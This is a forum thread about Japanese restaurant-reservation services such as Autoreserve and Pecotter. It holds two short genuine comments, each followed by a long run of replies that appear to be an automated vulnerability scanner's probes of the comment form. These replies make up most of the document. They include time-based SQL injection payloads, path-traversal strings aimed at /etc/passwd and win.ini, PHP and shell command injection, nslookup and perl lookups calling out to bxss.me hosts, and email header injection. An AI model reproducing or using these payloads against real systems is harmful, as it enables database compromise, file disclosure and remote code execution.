It just seems like services like Autoreserve, Percotter, etc. have an increasingly limited use case. In recent years, many new joints (frequently run by younger chefs) have started taking reservations online on Tablecheck, Toreta, or even just IG. So companies like Autoreserve aren't needed for those. At the high-end, many well-reviewed restaurants have either partnered with Omakase, Tableall, or require phone-camping at specific times to get seats, so again, a service that calls once every 40mins isn't useful there.

So what we're left with is the awkward middle-ground of restaurants that are under the radar, and run by old-school chefs who don't do online reservations. And only if you're staying at a hotel without a concierge (otherwise your concierge can easily book, since it's under the radar).

1680705955 Reply
Add photos

re: JJ

xnWJbLTX

1697002567

re: JJ

1*

1697002567

re: JJ

1*

1697002568

re: JJ

1*

1697002568

re: JJ

1*

1697002568

re: JJ

-1 OR 2+868-868-1=0+0+0+1

1697002568

re: JJ

-1 OR 3+868-868-1=0+0+0+1

1697002568

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002573

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002577

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002581

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002586

re: JJ

-1; waitfor delay '0:0:15' --

1697002590

re: JJ

-1); waitfor delay '0:0:15' --

1697002595

re: JJ

1 waitfor delay '0:0:15' --

1697002600

re: JJ

uDjhMGWB'; waitfor delay '0:0:15' --

1697002603

re: JJ

-5 OR 859=(SELECT 859 FROM PG_SLEEP(15))--

1697002607

re: JJ

bu4z3qok

1697002608

re: JJ

1*

1697002608

re: JJ

1*

1697002608

re: JJ

1*

1697002608

re: JJ

1*

1697002609

re: JJ

-1 OR 2+877-877-1=0+0+0+1

1697002609

re: JJ

-1 OR 3+877-877-1=0+0+0+1

1697002610

re: JJ

-5) OR 143=(SELECT 143 FROM PG_SLEEP(15))--

1697002614

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002615

re: JJ

-1)) OR 621=(SELECT 621 FROM PG_SLEEP(15))--

1697002618

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002619

re: JJ

HijFZjsJ' OR 119=(SELECT 119 FROM PG_SLEEP(15))--

1697002622

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002623

re: JJ

NHbOJtpx') OR 932=(SELECT 932 FROM PG_SLEEP(15))--

1697002626

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002627

re: JJ

kvoGbcIn')) OR 954=(SELECT 954 FROM PG_SLEEP(15))--

1697002630

re: JJ

-1; waitfor delay '0:0:15' --

1697002632

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002636

re: JJ

-1); waitfor delay '0:0:15' --

1697002637

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002640

re: JJ

1 waitfor delay '0:0:15' --

1697002641

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002645

re: JJ

1GQCSHak'; waitfor delay '0:0:15' --

1697002646

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002649

re: JJ

1'"

1697002649

re: JJ

@@NfLxw

1697002650

re: JJ

-5 OR 739=(SELECT 739 FROM PG_SLEEP(15))--

1697002650

re: JJ

-5) OR 883=(SELECT 883 FROM PG_SLEEP(15))--

1697002654

re: JJ

-1)) OR 760=(SELECT 760 FROM PG_SLEEP(15))--

1697002662

re: JJ

Nca27hmV' OR 336=(SELECT 336 FROM PG_SLEEP(15))--

1697002666

re: JJ

fwdA8O3U') OR 990=(SELECT 990 FROM PG_SLEEP(15))--

1697002670

re: JJ

qKOtGXg7')) OR 648=(SELECT 648 FROM PG_SLEEP(15))--

1697002673

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002678

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002682

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002686

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002690

re: JJ

1'"

1697002690

re: JJ

@@CjL6j

1697002691

re: JJ

1tLKQqKGO

1727141139

re: JJ

%0abcc:074625.67-13751.67.24afe.19990.2@bxss.me

1727141144

re: JJ

response.write(9510767*9054170)

1727141144

re: JJ

to@example.com>%0d%0abcc:074625.67-13752.67.24afe.19990.2@bxss.me

1727141144

re: JJ

'+response.write(9510767*9054170)+'

1727141145

re: JJ

"+response.write(9510767*9054170)+"

1727141146

re: JJ

<esi:include src="http://bxss.me/rpb.png"/>

1727141147

re: JJ

../../../../../../../../../../../../../../etc/passwd

1727141147

re: JJ

${9999878+9999998}

1727141148

re: JJ

../../../../../../../../../../../../../../windows/win.ini

1727141148

re: JJ

file:///etc/passwd

1727141149

re: JJ

../../../../../../../../../../../../../../../proc/version

1727141151

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141151

re: JJ

../../../../../../../../../../etc/passwd%00.jpg

1727141152

re: JJ

'.gethostbyname(lc('hitoc'.'pfoagydpdd2d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(65).chr(110).chr(89).'

1727141153

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141153

re: JJ

)

1727141153

re: JJ

".gethostbyname(lc("hiter"."aqqnwwyy4860d.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(70).chr(102).chr(65)."

1727141154

re: JJ

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141154

re: JJ

!(()&&!|*|*|

1727141154

re: JJ

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141155

re: JJ

^(#$!@#$)(()))******

1727141155

re: JJ

/etc/passwd

1727141155

re: JJ

echo ogintl$()\ wtoepq\nz^xyu||a #' &echo ogintl$()\ wtoepq\nz^xyu||a #|" &echo ogintl$()\ wtoepq\nz^xyu||a #

1727141156

re: JJ

%2fetc%2fpasswd

1727141156

re: JJ

&echo rhoucj$()\ hrzlpa\nz^xyu||a #' &echo rhoucj$()\ hrzlpa\nz^xyu||a #|" &echo rhoucj$()\ hrzlpa\nz^xyu||a #

1727141157

re: JJ

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141157

re: JJ

|echo sjjuqt$()\ mnxeuz\nz^xyu||a #' |echo sjjuqt$()\ mnxeuz\nz^xyu||a #|" |echo sjjuqt$()\ mnxeuz\nz^xyu||a #

1727141158

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141158

re: JJ

(nslookup hitizinnlrcrbd22ef.bxss.me||perl -e "gethostbyname('hitizinnlrcrbd22ef.bxss.me')")

1727141159

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141159

re: JJ

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141159

1727141160

re: JJ

$(nslookup hitdpwelsufuwf72a1.bxss.me||perl -e "gethostbyname('hitdpwelsufuwf72a1.bxss.me')")

1727141160

re: JJ

"+"A".concat(70-3).concat(22*4).concat(122).concat(70).concat(102).concat(88)+(require"socket"
Socket.gethostbyname("hitmg"+"asithino5d6f5.bxss.me.")[3].to_s)+"

1727141160

re: JJ

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141160

re: JJ

bxss.me/t/xss.html?%00

1727141160

re: JJ

&nslookup hitppzhhgzshcdb408.bxss.me&'\"`0&nslookup hitppzhhgzshcdb408.bxss.me&`'

1727141161

re: JJ

'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(122).concat(89)+(require'socket'
Socket.gethostbyname('hitmc'+'cuqcmskz5f4e9.bxss.me.')[3].to_s)+'

1727141161

re: JJ

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141161

re: JJ

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141161

re: JJ

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141162

re: JJ

&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&'\"`0&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&`'

1727141162

re: JJ

';print(md5(31337));$a='

1727141162

re: JJ

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141162

1727141163

re: JJ

|(nslookup hitjiwpthmyed69410.bxss.me||perl -e "gethostbyname('hitjiwpthmyed69410.bxss.me')")

1727141163

re: JJ

";print(md5(31337));$a="

1727141163

re: JJ

file:///etc/passwd

1727141163

re: JJ

'"

1727141163

1727141164

re: JJ

`(nslookup hitojhbwibnleecd98.bxss.me||perl -e "gethostbyname('hitojhbwibnleecd98.bxss.me')")`

1727141164

re: JJ

${@print(md5(31337))}

1727141164

re: JJ

/\../\../\../\../\../\../\../etc/passwd

1727141164

re: JJ

<!--

1727141164

re: JJ

/etc/shells

1727141165

re: JJ

;(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")|(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")&(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")

1727141165

re: JJ

${@print(md5(31337))}\

1727141165

re: JJ

/WEB-INF/web.xml

1727141165

re: JJ

c:/windows/win.ini

1727141166

re: JJ

'.print(md5(31337)).'

1727141166

re: JJ

C:\WINDOWS\system32\drivers\etc\hosts

1727141166

re: JJ

bxss.me

1727141166

re: JJ

../../../../../../../../../../windows/win.ini%00.jpg

1727141167

re: JJ

/../../../../../../../../../../boot.ini

1727141168

re: JJ

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141168

re: JJ

..\..\..\..\..\..\..\..\windows\win.ini

1727141169

re: JJ

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141170

re: JJ

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141171

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141172

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141172

re: JJ

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141173

re: JJ

WEB-INF/web.xml

1727141174

re: JJ

WEB-INF\web.xml

1727141175

re: JJ

1

1727141601

re: JJ

1

1727141613

re: JJ

-1 OR 2+997-997-1=0+0+0+1 --

1727141613

re: JJ

-1 OR 3+997-997-1=0+0+0+1 --

1727141613

re: JJ

-1 OR 2+385-385-1=0+0+0+1

1727141614

re: JJ

-1 OR 3+385-385-1=0+0+0+1

1727141614

re: JJ

-1' OR 2+296-296-1=0+0+0+1 --

1727141614

re: JJ

-1' OR 3+296-296-1=0+0+0+1 --

1727141615

re: JJ

-1' OR 2+569-569-1=0+0+0+1 or 'IZ6AtQH6'='

1727141615

re: JJ

-1' OR 3+569-569-1=0+0+0+1 or 'IZ6AtQH6'='

1727141616

re: JJ

-1" OR 2+274-274-1=0+0+0+1 --

1727141616

re: JJ

-1" OR 3+274-274-1=0+0+0+1 --

1727141617

re: JJ

if(now()=sysdate(),sleep(15),0)

1727141653

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141686

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141696

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141710

re: JJ

-1; waitfor delay '0:0:15' --

1727141722

re: JJ

-1); waitfor delay '0:0:15' --

1727141733

re: JJ

1 waitfor delay '0:0:15' --

1727141745

re: JJ

BddABrpH'; waitfor delay '0:0:15' --

1727141756

re: JJ

-5 OR 936=(SELECT 936 FROM PG_SLEEP(15))--

1727141767

re: JJ

-5) OR 199=(SELECT 199 FROM PG_SLEEP(15))--

1727141776

re: JJ

-1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))--

1727141784

re: JJ

PhOVAyvY' OR 775=(SELECT 775 FROM PG_SLEEP(15))--

1727141792

re: JJ

UVRQFlcd') OR 215=(SELECT 215 FROM PG_SLEEP(15))--

1727141801

re: JJ

MChBWX0o')) OR 818=(SELECT 818 FROM PG_SLEEP(15))--

1727141809

re: JJ

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141819

re: JJ

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141834

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1727141843

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1727141855

re: JJ

1'"

1727141856

re: JJ

@@nc0Zj

1727141857

re: JJ

1

1727383065

re: JJ

1

1727383065

re: JJ

1

1727383065

re: JJ

1

1727383590

re: JJ

1

1727383590

re: JJ

1

1727383591

It's a little odd to me to imagine a restaurant would on one hand not use online booking, but on the other be ok with robots calling (/harassing) them to make reservations. That being said Pecotter and the likes often come on top of google search, so maybe they work,,, or maybe they have really good SEO.

1681050449 Reply
Add photos

re: kk1337

3dPXIlKr

1697002608

re: kk1337

1*

1697002609

re: kk1337

1*

1697002609

re: kk1337

1*

1697002609

re: kk1337

1*

1697002609

re: kk1337

-1 OR 2+923-923-1=0+0+0+1

1697002610

re: kk1337

-1 OR 3+923-923-1=0+0+0+1

1697002610

re: kk1337

grqrBmak

1697002614

re: kk1337

1*

1697002615

re: kk1337

1*

1697002615

re: kk1337

1*

1697002615

re: kk1337

1*

1697002615

re: kk1337

-1 OR 2+808-808-1=0+0+0+1

1697002616

re: kk1337

-1 OR 3+808-808-1=0+0+0+1

1697002616

re: kk1337

if(now()=sysdate(),sleep(15),0)

1697002616

re: kk1337

if(now()=sysdate(),sleep(15),0)

1697002620

re: kk1337

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002620

re: kk1337

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002623

re: kk1337

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002624

re: kk1337

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002627

re: kk1337

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002627

re: kk1337

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002632

re: kk1337

-1; waitfor delay '0:0:15' --

1697002632

re: kk1337

-1; waitfor delay '0:0:15' --

1697002637

re: kk1337

-1); waitfor delay '0:0:15' --

1697002637

re: kk1337

-1); waitfor delay '0:0:15' --

1697002642

re: kk1337

1 waitfor delay '0:0:15' --

1697002642

re: kk1337

1 waitfor delay '0:0:15' --

1697002646

re: kk1337

UBnryigN'; waitfor delay '0:0:15' --

1697002646

re: kk1337

aKBETc9q'; waitfor delay '0:0:15' --

1697002650

re: kk1337

-5 OR 171=(SELECT 171 FROM PG_SLEEP(15))--

1697002651

re: kk1337

-5 OR 43=(SELECT 43 FROM PG_SLEEP(15))--

1697002655

re: kk1337

-5) OR 745=(SELECT 745 FROM PG_SLEEP(15))--

1697002658

re: kk1337

-5) OR 388=(SELECT 388 FROM PG_SLEEP(15))--

1697002663

re: kk1337

-1)) OR 954=(SELECT 954 FROM PG_SLEEP(15))--

1697002663

re: kk1337

-1)) OR 253=(SELECT 253 FROM PG_SLEEP(15))--

1697002667

re: kk1337

xoDC3nnK' OR 929=(SELECT 929 FROM PG_SLEEP(15))--

1697002667

re: kk1337

c5yzRdfN' OR 269=(SELECT 269 FROM PG_SLEEP(15))--

1697002670

re: kk1337

eWwQDsSG') OR 450=(SELECT 450 FROM PG_SLEEP(15))--

1697002671

re: kk1337

T3E2AtOe') OR 895=(SELECT 895 FROM PG_SLEEP(15))--

1697002674

re: kk1337

vo03ngz2')) OR 260=(SELECT 260 FROM PG_SLEEP(15))--

1697002674

re: kk1337

s6ydlbeL')) OR 865=(SELECT 865 FROM PG_SLEEP(15))--

1697002679

re: kk1337


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002680

re: kk1337


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002682

re: kk1337


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002683

re: kk1337


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002686

re: kk1337

'||(select 1 from (select pg_sleep(15))x)||'

1697002687

re: kk1337

'||(select 1 from (select pg_sleep(15))x)||'

1697002690

re: kk1337

''||(select 1 from (select pg_sleep(15))x)||''

1697002691

re: kk1337

1'"

1697002692

re: kk1337

@@lWQNd

1697002692

re: kk1337

''||(select 1 from (select pg_sleep(15))x)||''

1697002694

re: kk1337

1'"

1697002694

re: kk1337

@@4ePME

1697002695

re: kk1337

1E09G0e4O

1727141117

re: kk1337

%0abcc:074625.67-13745.67.59ad6.19990.2@bxss.me

1727141119

re: kk1337

to@example.com>%0d%0abcc:074625.67-13746.67.59ad6.19990.2@bxss.me

1727141120

re: kk1337

response.write(9364609*9727312)

1727141120

re: kk1337

'+response.write(9364609*9727312)+'

1727141121

re: kk1337

<esi:include src="http://bxss.me/rpb.png"/>

1727141122

re: kk1337

"+response.write(9364609*9727312)+"

1727141122

re: kk1337

${9999090+9999333}

1727141122

re: kk1337

../../../../../../../../../../../../../../etc/passwd

1727141123

re: kk1337

../../../../../../../../../../../../../../windows/win.ini

1727141124

re: kk1337

file:///etc/passwd

1727141125

re: kk1337

../../../../../../../../../../../../../../../proc/version

1727141126

re: kk1337

'.gethostbyname(lc('hitza'.'ckfqntwpbec85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(65).chr(99).chr(77).'

1727141126

re: kk1337

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141127

re: kk1337

".gethostbyname(lc("hitzd"."ynnnbebj0ae59.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(72).chr(107).chr(88)."

1727141127

re: kk1337

../../../../../../../../../../etc/passwd%00.jpg

1727141128

re: kk1337

)

1727141128

re: kk1337

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141129

re: kk1337

!(()&&!|*|*|

1727141129

re: kk1337

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141130

re: kk1337

^(#$!@#$)(()))******

1727141130

re: kk1337

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141130

re: kk1337

/etc/passwd

1727141131

re: kk1337

echo vjcvqg$()\ sfqmkr\nz^xyu||a #' &echo vjcvqg$()\ sfqmkr\nz^xyu||a #|" &echo vjcvqg$()\ sfqmkr\nz^xyu||a #

1727141132

